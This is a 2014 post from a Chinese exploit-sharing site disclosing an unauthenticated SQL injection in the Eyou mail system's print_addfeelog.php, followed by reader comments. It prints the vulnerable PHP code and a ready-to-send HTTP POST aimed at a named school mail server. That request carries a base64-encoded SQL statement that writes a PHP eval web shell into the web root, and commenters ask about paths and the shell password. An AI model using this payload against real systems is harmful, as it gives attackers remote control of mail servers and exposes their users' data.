漏洞时代 - 最新漏洞_0DaY5.CoM漏洞时代 - 最新漏洞_0DaY5.CoM

亿邮邮件系统SQL导致批量GetShell(无需登录)

漏洞作者: 路人甲

漏洞文件:\php\bill\print_addfeelog.php

执行任意SQL命令,且不受GPC影响。

默认MYSQL都是有权限导出文件权限的,可以导出一句话后门。

[php]

<?

include("include/config.inc");

include("include/mysql_wrap.php");

include("include/utils.php");

include("include/message.php");

include("common/check_admin.php");

 

$sql = base64_decode($_REQUEST['all_sql']);

$eyouSql = new eyousql();

 

$eyouSql->query($sql);

?>

[/php]

利用代码:

[php]

POST /php/bill/print_addfeelog.php HTTP/1.1

Content-Length: 140

Host: mail.sihs.edu.cn

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.2; zh-CN; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us

Accept-Encoding: gzip,deflate

Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Connection: keep-alive

X-Forwarded-For: 127.0.0.1

Cookie: cookie=1;

 

all_sql=c2VsZWN0ICc8P3BocCBldmFsKCRfUE9TVFsxXSk/PmMnIGludG8gb3V0ZmlsZSAnL3Zhci9leW91L2FwYWNoZS9odGRvY3MvcGhwL2JpbGwvc2NyaXB0L2luZGV4LnBocCc7

[/php]

12081253b82d5675029d4e106190c237e2bf3d22

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » 亿邮邮件系统SQL导致批量GetShell(无需登录)

评论 7

  1. 这个怎么获取路径呢?难道都是这个默认路径吗?

    菜鸟求指点 2014-08-26    回复
    • 额·照作者说的应该是的

      0day5 2014-08-27    回复
      • 那这个很鸡肋啊。。而且默认路径很少人装把

        菜鸟求指点 2014-08-27    回复
  2. :!: :smile: :grin: :shock: :cool: :twisted: :wink: :arrow: :neutral: :mrgreen: :sad: :razz:

    aaaaa 2014-08-05    回复
  3. 真的是无需登录吗 :cry:

    wenchun 2014-08-05    回复
  4. 请问那是什么编码,还有一句话密码是多少

    wenchun 2014-08-05    回复
    • 哦,不用了,i know :oops:

      wenchun 2014-08-05    回复